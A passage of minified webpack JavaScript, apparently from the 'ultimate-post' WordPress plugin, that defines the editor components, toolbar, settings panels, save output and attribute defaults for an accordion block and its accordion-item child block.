o=l(67294),a=l(53049),i=l(87763);const{useState:n}=wp.element,{__}=wp.i18n,{Dropdown:r,ToolbarButton:s,ToolbarGroup:p}=wp.components,c=({store:e,handleAddAccordion:t})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(p,null,(0,o.createElement)(s,{label:"add new Accordion",onClick:()=>t()},(0,o.createElement)("div",{className:"ultp-toolbar-add-new"},"Add Accordion"))),(0,o.createElement)(p,null,(0,o.createElement)(a.lj,{store:e,attrKey:"barContentAlignment",options:a.M9,label:__("Bar Content Alignment","ultimate-post")})),(0,o.createElement)(r,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(s,{label:"Style",icon:i.Z.styleIcon,onClick:()=>e()}),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:5,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"titleColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"titleIconColor",label:__("Title Icon Color","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"titleHoverColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleHoverColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"iconHoverColor",label:__("Title Icon Color","ultimate-post")}]},{name:"active",title:__("Active","ultimate-post"),options:[{type:"color",key:"titleActiveColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleActiveColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"iconActiveColor",label:__("Title Icon Color","ultimate-post")}]}]}}],initialOpen:!0,store:e})}),(0,o.createElement)(r,{focusOnMount:!0,contentClassName:"ultp-menu-toolbar-drop",renderToggle:({onToggle:e})=>(0,o.createElement)(p,null,(0,o.createElement)(s,{label:"Spacing",icon:i.Z.spacing,onClick:()=>e()})),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:1,data:{type:"range",key:"barWrapGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Accordion Bars","ultimate-post")}}],initialOpen:!0,store:e})}))},87668:(e,t,l)=>{"use strict";l.d(t,{Z:()=>T});var o=l(67294),a=l(53049),i=l(99838),n=l(87763),r=l(31760),s=l(49160),p=l(5501);const{__}=wp.i18n,{useEffect:c,useState:u,Fragment:d}=wp.element,{InnerBlocks:m,InspectorControls:g,BlockControls:y,useBlockProps:b}=wp.blockEditor,{insertBlocks:v,updateBlockAttributes:h}=wp.data.dispatch("core/block-editor"),{getBlockAttributes:f,getBlockRootClientId:k,getBlockOrder:w,getBlocks:x}=wp.data.select("core/block-editor");function T(e){const[t,l]=u("Content"),{setAttributes:T,name:_,attributes:C,className:E,clientId:S,attributes:{blockId:P,currentPostId:L,advanceId:I,previewImg:B,enableTitleIcon:U,enableSubtitle:M,titleIcon:A,subtitlePosition:H,titleIconPosition:N,triggerIconPosition:j,chooseTriggerIconOpen:Z,chooseTriggerIconClosed:O,triggerIcon:R,autoCollapseEnable:D,initialSelectItem:z}}=e;c((()=>{const e=S.substr(0,6),t=f(k(S));(0,a.qi)(T,t,L,S),P?P&&P!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||T({blockId:e})):T({blockId:e})}),[S]);const F={setAttributes:T,name:_,attributes:C,setSection:l,section:t,clientId:S};let W;if(P&&(W=(0,i.Kh)(C,"ultimate-post/accordion",P,(0,a.k0)())),B)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:B});const[V,G]=u(!1),q=w(S).length,$=()=>{G(!V);const e=x(S);e.length>0&&e.forEach((e=>{h(e.clientId,{activeBlock:!1})}));const t={activeBlock:!0,titleIcon:A,accText:"Add Your Accordion Title",enableSubtitle:M,enableTitleIcon:U,triggerIconPosition:j,chooseTriggerIconOpen:Z,chooseTriggerIconClosed:O},l=wp.blocks.createBlock("ultimate-post/accordion-item",t);v(l,q,S,!0)};c((()=>{const e=x(S);e.length>0&&e.forEach((e=>{h(e.clientId,{titleIcon:A,triggerIcon:R,enableSubtitle:M,initSelectAcc:z,enableTitleIcon:U,autoCollapseEnable:D,triggerIconPosition:j,chooseTriggerIconOpen:Z,chooseTriggerIconClosed:O})}))}),[A,R,M,U,V,z,D,j,Z,O]);let K=[];const J=x(S);c((()=>{J.forEach(((e,t)=>{const l={label:e.attributes.accText,value:t};K=[...K,l]})),K?.length>0&&T({accordionList:K})}),[J]);const Y=b({...I&&{id:I},className:`ultp-block-${P} ${E}`});return(0,o.createElement)(d,null,(0,o.createElement)(g,null,(0,o.createElement)(p.Z,{store:F})),(0,o.createElement)(y,null,(0,o.createElement)(s.Z,{store:F,handleAddAccordion:$})),(0,o.createElement)(r.Z,{include:[{type:"template"}],store:F}),(0,o.createElement)("div",Y,W&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:W}}),(0,o.createElement)("div",{className:`ultp-block-wrapper ultp-accordion-wrapper ultp-accordion__subtitle-${H} ultp-accordion__icon-${N}`},(0,o.createElement)(m,{renderAppender:!1,template:[["ultimate-post/accordion-item",{activeBlock:!0,titleIcon:A,enableSubtitle:M,enableTitleIcon:U,triggerIconPosition:j,chooseTriggerIconOpen:Z,chooseTriggerIconClosed:O}]],allowedBlocks:["ultimate-post/accordion-item"]}),(0,o.createElement)("div",{className:"ultp-accordion-new"},(0,o.createElement)("span",{className:"ultp-accordion-new__wrapper",onClick:()=>$()},n.Z.plus," Add New Accordion")))))}},70124:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,titleIconPosition:r,subtitlePosition:s,initialSelectItem:p,autoCollapseEnable:c,className:u}=e.attributes,d=n.save({...l&&{id:l},className:`ultp-block-${t} ${u}`});return(0,a.createElement)("div",(0,o.Z)({},d,{"data-bid":t,"data-active":p,"data-autocollapse":c}),(0,a.createElement)("div",{className:`ultp-accordion-wrapper ultp-accordion__subtitle-${s} ultp-accordion__icon-${r}`},(0,a.createElement)(i.Content,null)))}},5501:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=({store:e})=>{const{accordionList:t,triggerIcon:l}=e?.attributes;let r=t&&t.sort(((e,t)=>e.value-t.value)).map((e=>({value:`${e.value}`,label:__(`#${e.value} ${e.label} `,"ultimate-post")})));return r=[...r,{value:"None",label:__("None","ultimate-post")}],(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid8851",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"accordion-settings",title:__("Setting","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",initialOpen:!0,include:[{position:1,data:{type:"toggle",key:"autoCollapseEnable",label:__("Enable auto-collapse","ultimate-post")}},{position:2,data:{type:"select",key:"initialSelectItem",options:r?.length>0?r:[],label:__("Initially Opened Accordion","ultimate-post")}},{position:3,data:{type:"toggle",key:"enableSubtitle",label:__("Enable Subtitle","ultimate-post")}},{position:4,data:{type:"tag",key:"subtitlePosition",label:__("Subtitle Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")},{value:"top",label:__("Top","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}},{position:5,data:{type:"toggle",key:"enableTitleIcon",label:__("Title Icon","ultimate-post")}},{position:6,data:{type:"icon",key:"titleIcon",help:"Remove individual icons to apply the same icons to all sections",label:__("Choose Icon","ultimate-post")}},{position:7,data:{type:"tag",key:"titleIconPosition",label:__("Icon Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{position:8,data:{type:"toggle",key:"triggerIcon",label:__("Accordion Trigger Icon","ultimate-post")}},{position:9,data:{type:"icon",key:"chooseTriggerIconOpen",label:__("Accordion Open","ultimate-post")}},{position:9,data:{type:"icon",key:"chooseTriggerIconClosed",label:__("Accordion Closed","ultimate-post")}},{position:10,data:{type:"tag",key:"triggerIconPosition",label:__("Icon Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}}],initialOpen:!0,store:e})),(0,o.createElement)(i.Section,{slug:"style",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{title:__("Bar Element Style","ultimate-post"),include:[{position:1,data:{type:"alignment",key:"barContentAlignment",disableJustify:!0,label:__("Alignment","ultimate-post")}},{position:2,data:{type:"typography",key:"titleTypo",label:__("Title Typography","ultimate-post")}},{position:3,data:{type:"typography",key:"subtextTypo",label:__("Subtitle Typography","ultimate-post")}},{position:4,data:{type:"range",key:"titleIconSize",min:0,max:300,step:1,responsive:!0,label:__("Title Icon Size","ultimate-post")}},{position:5,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"titleColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"titleIconColor",label:__("Title Icon Color","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"titleHoverColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleHoverColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"iconHoverColor",label:__("Title Icon Color","ultimate-post")}]},{name:"active",title:__("Active","ultimate-post"),options:[{type:"color",key:"titleActiveColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleActiveColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"iconActiveColor",label:__("Title Icon Color","ultimate-post")}]}]}},{position:6,data:{type:"range",key:"titleSubtextGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Title & Subtitle","ultimate-post")}},{position:7,data:{type:"range",key:"titleIconGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Title & Title Icon","ultimate-post")}}],initialOpen:!0,store:e}),l&&(0,o.createElement)(a.T,{title:__("Accordion Trigger Icon","ultimate-post"),include:[{position:1,data:{type:"range",key:"triIconSize",min:0,max:300,step:1,responsive:!0,label:__("Icon Size","ultimate-post")}},{position:2,data:{type:"range",key:"titleTriggerIconGap",min:0,max:300,step:1,responsive:!0,label:__("Title & Trigger Icon Gap","ultimate-post")}},{position:3,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"triIconColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"triIconBg",label:__("Icon Background Color","ultimate-post")},{type:"border",key:"triIconBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"triIconRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"triIconHoverColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"triIconHoverBg",label:__("Icon Background Color","ultimate-post")},{type:"border",key:"triIconHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"triIconHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"active",title:__("Active","ultimate-post"),options:[{type:"color",key:"triIconActiveColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"triIconActiveBg",label:__("Icon Background Color","ultimate-post")},{type:"border",key:"triIconActiveBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"triIconActiveRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}},{position:4,data:{type:"dimension",key:"triIconPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Accordion Bar Wrapper","ultimate-post"),include:[{position:1,data:{type:"range",key:"barWrapGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Accordion Bars","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"barWrapBg",label:__("Background","ultimate-post")},{type:"border",key:"barWrapBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"barWrapRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"barWrapShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"barWrapHoverBg",label:__("Background","ultimate-post")},{type:"border",key:"barWrapHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"barWrapHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"barWrapHoverShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"active",title:__("Active","ultimate-post"),options:[{type:"color2",key:"barWrapActiveBg",label:__("Background","ultimate-post")},{type:"border",key:"barWrapActiveBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"barWrapActiveRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"barWrapActiveShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]}]}},{position:4,data:{type:"dimension",key:"barWrapperPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Content Area","ultimate-post"),include:[{position:1,data:{type:"range",key:"contentBarGap",min:0,max:300,step:1,responsive:!0,label:__("Gap From Accordion Bar","ultimate-post")}},{position:2,data:{type:"border",key:"contentBorder",label:__("Border","ultimate-post")}},{position:3,data:{type:"dimension",key:"contentRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:4,data:{type:"dimension",key:"contentPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:5,data:{type:"color2",key:"contentBg",label:__("Background","ultimate-post")}}],store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))}},57288:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294),a=l(41557),i=l(87763);const{Dropdown:n,ToolbarGroup:r,ToolbarButton:s}=wp.components,p=({store:e})=>{const{itemSingleIcon:t}=e.attributes;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r,null,(0,o.createElement)(s,{label:"Duplicate",icon:i.Z.duplicate,onClick:()=>{wp.data.dispatch("core/block-editor").duplicateBlocks([e?.clientId],!0)}})),(0,o.createElement)(n,{popoverProps:{placement:"bottom-start"},className:"ultp-social-dropdown",renderToggle:({onToggle:e})=>(0,o.createElement)(r,{className:"ultp-toolbar-title-icon"},(0,o.createElement)(s,{size:"small",className:"ultp-toolbar-add-new",label:"Icon",onClick:()=>e()},"Title Icon")),renderContent:()=>(0,o.createElement)(a.Z,{inline:!0,value:t,isSocial:!0,label:"Update Single Icon",dynamicClass:" ",onChange:t=>e.setAttributes({itemSingleIcon:t})})}))}},14370:(e,t,l)=>{"use strict";l.d(t,{Z:()=>L});var o=l(67294),a=l(53049),i=l(99838),n=l(41557),r=l(64766),s=l(57288),p=l(28189);const{__}=wp.i18n,{Dropdown:c}=wp.components,{useEffect:u,useState:d,Fragment:m,useRef:g}=wp.element,{InnerBlocks:y,RichText:b,InspectorControls:v,BlockControls:h,useBlockProps:f}=wp.blockEditor,{updateBlockAttributes:k}=wp.data.dispatch("core/block-editor"),{getBlocks:w,getBlockOrder:x,getBlockIndex:T,toggleSelection:_,getSelectedBlock:C,getBlockAttributes:E,getBlockRootClientId:S,getSelectedBlockClientId:P}=wp.data.select("core/block-editor");function L(e){const[t,l]=d("Content"),{setAttributes:n,name:c,attributes:b,className:_,clientId:L,attributes:{blockId:B,currentPostId:U,advanceId:M,previewImg:A,activeBlock:H,triggerIconPosition:N,chooseTriggerIconClosed:j,chooseTriggerIconOpen:Z,triggerIcon:O,autoCollapseEnable:R,initSelectAcc:D}}=e,z=g();u((()=>{const e=L.substr(0,6),t=E(S(L));(0,a.qi)(n,t,U,L),B?B&&B!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||n({blockId:e})):n({blockId:e})}),[L]);const F={setAttributes:n,name:c,attributes:b,setSection:l,section:t,clientId:L};let W;if(B&&(W=(0,i.Kh)(b,"ultimate-post/accordion-item",B,(0,a.k0)())),A)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:A});let V=0;const G=T(L),q=C(),$=x(L).length>0;if(q){const e=q.clientId;V=T(e)}const K=S(L),J=w(K),[Y,X]=d(H),Q=!R||H,ee=S(P());u((()=>{!e.isSelected&&J.length>1&&q?.clientId!=K&&!ee&&X(!1)}),[e.isSelected]),u((()=>{D==G&&(X(!0),J.forEach(((e,t)=>{k(e.clientId,t==D?{activeBlock:!0}:{activeBlock:!1})})))}),[D]);const te=Z?.length>0?Z:"arrowUp2",le=j?.length>0?j:"collapse_bottom_line",oe=f({...M&&{id:M},className:`ultp-block-${B} ${_} ${Q&&Y?"active-accordion":""}`});return(0,o.createElement)(m,null,(0,o.createElement)(v,null,(0,o.createElement)(p.Z,{store:F})),(0,o.createElement)(h,null,(0,o.createElement)(s.Z,{store:F})),(0,o.createElement)("div",oe,W&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:W}}),(0,o.createElement)("div",{className:`ultp-accordion-item ultp-accordion__trigger-${N}`},(0,o.createElement)("div",{className:"ultp-accordion-item__navigation ultp-acr-navigation",onClick:()=>{return e=G,X(!Y),void(R&&J.forEach(((t,l)=>{k(t.clientId,l==e?{activeBlock:!0}:{activeBlock:!1})})));var e}},O&&(0,o.createElement)("div",{className:"ultp-accordion-item__control"},Q&&Y?r.ZP[te]:r.ZP[le]),(0,o.createElement)("div",{className:"ultp-accordion-item__nav-content"},(0,o.createElement)(I,{store:F,attributes:b,setAttributes:n}))),(0,o.createElement)("div",{ref:z,className:`ultp-accordion-item__content ${Q&&Y?"active":""} `},(0,o.createElement)("div",{className:"ultp-accordion-item__content-inside"},(0,o.createElement)(y,{renderAppender:$?void 0:()=>(0,o.createElement)(y.ButtonBlockAppender,null)}))))))}const I=({setAttributes:e,attributes:t,store:l})=>{const{accText:a,enableSubtitle:i,accSubText:n,enableTitleIcon:r,itemSingleIcon:s,titleIcon:p}=t;return(0,o.createElement)("div",{className:"ultp-accordion-item__text-content"},(0,o.createElement)("div",{className:"ultp-accordion-item__title-wrapper"},r&&(s?.length>0||p?.length>0)&&(0,o.createElement)(B,{itemSingleIcon:s,titleIcon:p,store:l}),(0,o.createElement)(b,{key:"editable",tagName:"div",className:"ultp-accordion-title",keeplaceholderonfocus:"true",allowedFormats:["ultimate-post/dynamic-content"],placeholder:__("Add Your Main Text…","ultimate-post"),onChange:t=>e({accText:t}),value:a})),i&&(0,o.createElement)(b,{key:"editable",tagName:"div",className:"ultp-accordion-subtitle",allowedFormats:["ultimate-post/dynamic-content"],placeholder:__("Add some matching sub-text here….","ultimate-post"),onChange:t=>e({accSubText:t}),value:n}))},B=({itemSingleIcon:e,titleIcon:t,store:l})=>(0,o.createElement)("div",{className:"ultp-accordion-item__nav-icon"},(0,o.createElement)(c,{popoverProps:{placement:"bottom-start"},className:"ultp-listicon-dropdown",renderToggle:({onToggle:l,onClose:a})=>(0,o.createElement)("div",{onClick:()=>l(),className:"ultp-listicon-bg"},r.ZP[e&&e?.length>0?e:t]),renderContent:()=>(0,o.createElement)(n.Z,{inline:!0,value:e,label:"Update Single Icon",dynamicClass:" ",onChange:e=>l.setAttributes({itemSingleIcon:e})})}))},85057:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,enableTitleIcon:r,accText:s,triggerIconPosition:p,triggerIcon:c,enableSubtitle:u,accSubText:d,titleIcon:m,chooseTriggerIconOpen:g,chooseTriggerIconClosed:y,itemSingleIcon:b}=e.attributes,v=g?.length>0?g:"arrowUp2",h=y?.length>0?y:"collapse_bottom_line",f=n.save({...l&&{id:l},className:`ultp-block-${t} ultpMenuCss`});return(0,a.createElement)("div",(0,o.Z)({"data-bid":t},f),(0,a.createElement)("div",{className:`ultp-accordion-item ultp-accordion__trigger-${p}`},(0,a.createElement)("div",{className:"ultp-accordion-item__navigation ultp-acr-navigation"},c&&(0,a.createElement)("div",{className:"ultp-accordion-item__control"},"_ultp_aci_ic_"+v+"_ultp_aci_ic_end_","_ultp_aci_ic_"+h+"_ultp_aci_ic_end_"),(0,a.createElement)("div",{className:"ultp-accordion-item__nav-content"},(0,a.createElement)("div",{className:"ultp-accordion-item__text-content"},(0,a.createElement)("div",{className:"ultp-accordion-item__title-wrapper"},r&&(b&&b?.length||m.length>0)&&(0,a.createElement)("div",{className:"ultp-accordion-item__nav-icon"},"_ultp_aci_ic_"+(b&&b?.length>0?b:m)+"_ultp_aci_ic_end_"),(0,a.createElement)("div",{className:"ultp-accordion-title",dangerouslySetInnerHTML:{__html:s}})),u&&(0,a.createElement)("div",{className:"ultp-accordion-subtitle",dangerouslySetInnerHTML:{__html:d}})))),(0,a.createElement)("div",{className:"ultp-accordion-item__content ultp-acr-content"},(0,a.createElement)("div",{className:"ultp-accordion-item__content-inside"},(0,a.createElement)(i.Content,null)))))}},28189:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(92637),n=l(64766);const{__}=wp.i18n,{selectBlock:r}=wp.data.dispatch("core/block-editor"),s=({store:e})=>{const{getBlockRootClientId:t}=wp.data.select("core/block-editor"),{clientId:l}=e;return(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"accordion",title:__("Accordion","ultimate-post")},(0,o.createElement)("div",{className:"ultp-accordion-parent-selection",onClick:()=>(()=>{const e=t(l);r(e)})()},n.ZP.leftArrowLg," Go Back to Parent Settings"),(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"icon",key:"itemSingleIcon",help:"Enable Icons in the Main Settings to add Individual Icons",label:__("Individual Icon","ultimate-post")}}],initialOpen:!0,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{initialOpen:!0,store:e}),(0,o.createElement)(a.iv,{store:e})))}},59589:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},accText:{type:"string",default:"Add Your Accordion Title"},accSubText:{type:"string",default:"Add some matching sub-text here."},triggerIconPosition:{type:"string",default:"right"},enableTitleIcon:{type:"boolean",default:"true"},enableSubtitle:{type:"boolean",default:"true"},titleIcon:{type:"string",default:"rectangle_solid"},chooseTriggerIconOpen:{type:"string",default:"arrowUp2"},chooseTriggerIconClosed:{type:"string",default:"collapse_bottom_line"},triggerIcon:{type:"boolean",default:!0},activeBlock:{type:"boolean",default:!1},autoCollapseEnable:{type:"boolean",default:!0},itemSingleIcon:{type:"string",default:""},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-button-wrapper {z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},18866:(e,t,l)=>{"use strict";var o=l(67294),a=l(14370),i=l(85057),n=l(59589),r=l(16998);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/accordion-item.svg"}),parent:["ultimate-post/accordion"],attributes:n.Z,edit:a.Z,save:i.Z})},76931:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},accordionList:{type:"string",default:""},autoCollapseEnable:{type:"boolean",default:!0},initialSelectItem:{type:"string",default:"none"},enableSubtitle:{type:"boolean",default:!1},subtitlePosition:{type:"string",default:"bottom",style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}]}]},enableTitleIcon:{type:"boolean",default:!1},titleIcon:{type:"string",default:"arrow_left_circle_line",style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}]}]},titleIconPosition:{type:"string",default:"left",style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}]}]},triggerIcon:{type:"boolean",default:!0},triggerIconPosition:{type:"string",default:"right",style:[{depends:[{key:"triggerIcon",condition:"==",value:!0}]}]},chooseTriggerIconOpen:{type:"string",default:"arrowUp2",style:[{depends:[{key:"triggerIcon",condition:"==",value:!0}]}]},chooseTriggerIconClosed:{type:"string",default:"collapse_bottom_line",style:[{depends:[{key:"triggerIcon",condition:"==",value:!0}]}]},barContentAlignment:{type:"string",default:"left",style:[{depends:[{key:"barContentAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-accordion-item__nav-content { width: 100%; display: flex; justify-content: center; }\n            {{ULTP}} .ultp-accordion-item__text-content { align-items: center; text-align: center; }"},{depends:[{key:"barContentAlignment",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-items-wrap { grid-template-columns: repeat({{columns}}, 1fr); }"},{depends:[{key:"barContentAlignment",condition:"==",value:"right"},{key:"subtitlePosition",condition:"!=",value:"bottom"},{key:"subtitlePosition",condition:"!=",value:"top"}],selector:"\n            {{ULTP}} .ultp-accordion-item__nav-content { width: 100%; display: flex; justify-content: flex-start; flex-direction: row-reverse; } \n            {{ULTP}} .ultp-accordion-item__text-content { align-items: center; text-align: right; } \n            "},{depends:[{key:"barContentAlignment",condition:"==",value:"right"},{key:"subtitlePosition",condition:"==",value:"bottom"}],selector:"\n            {{ULTP}} .ultp-accordion-item__nav-content { width: 100%; display: flex; justify-content: flex-start; flex-direction: row-reverse; } \n            {{ULTP}} .ultp-accordion-item__text-content { align-items: flex-end; text-align: right; } \n            "},{depends:[{key:"barContentAlignment",condition:"==",value:"right"},{key:"subtitlePosition",condition:"==",value:"top"}],selector:"\n            {{ULTP}} .ultp-accordion-item__nav-content { width: 100%; display: flex; justify-content: flex-start; flex-direction: row-reverse; } \n            {{ULTP}} .ultp-accordion-item__text-content { align-items: flex-end; text-align: right; } \n            "}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:18,unit:"px"},height:{lg:"22",unit:"px"},decoration:"none",family:"",weight:500},style:[{selector:"{{ULTP}} .ultp-accordion-title"}]},subtextTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"28",unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-subtitle"}]},titleIconSize:{type:"object",default:{lg:"18",unit:"px"},style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__nav-icon svg { height:{{titleIconSize}}; width:{{titleIconSize}}; }"}]},titleColor:{type:"string",default:"#070707",style:[{selector:"{{ULTP}} .ultp-accordion-title { color:{{titleColor}}; }"}]},subtitleColor:{type:"string",default:"#484848",style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-subtitle { color:{{subtitleColor}}; }"}]},titleIconColor:{type:"string",default:"#070707",style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__nav-icon svg { color:{{titleIconColor}}; }"}]},titleHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover .ultp-accordion-title { color:{{titleHoverColor}}; }"}]},subtitleHoverColor:{type:"string",default:"",style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__navigation:hover .ultp-accordion-subtitle { color:{{subtitleHoverColor}}; }"}]},iconHoverColor:{type:"string",default:"",style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__navigation:hover .ultp-accordion-item__nav-icon svg { color:{{iconHoverColor}}; }"}]},titleActiveColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-title { color:{{titleActiveColor}}; }"}]},subtitleActiveColor:{type:"string",default:"",style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-subtitle { color:{{subtitleActiveColor}}; }"}]},iconActiveColor:{type:"string",default:"",style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-item__nav-icon svg { color:{{iconActiveColor}}; }"}]},titleSubtextGap:{type:"object",default:{lg:"6",unit:"px"},style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__text-content { gap:{{titleSubtextGap}}; }"}]},titleIconGap:{type:"object",default:{lg:"12",unit:"px"},style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__title-wrapper { gap:{{titleIconGap}}; 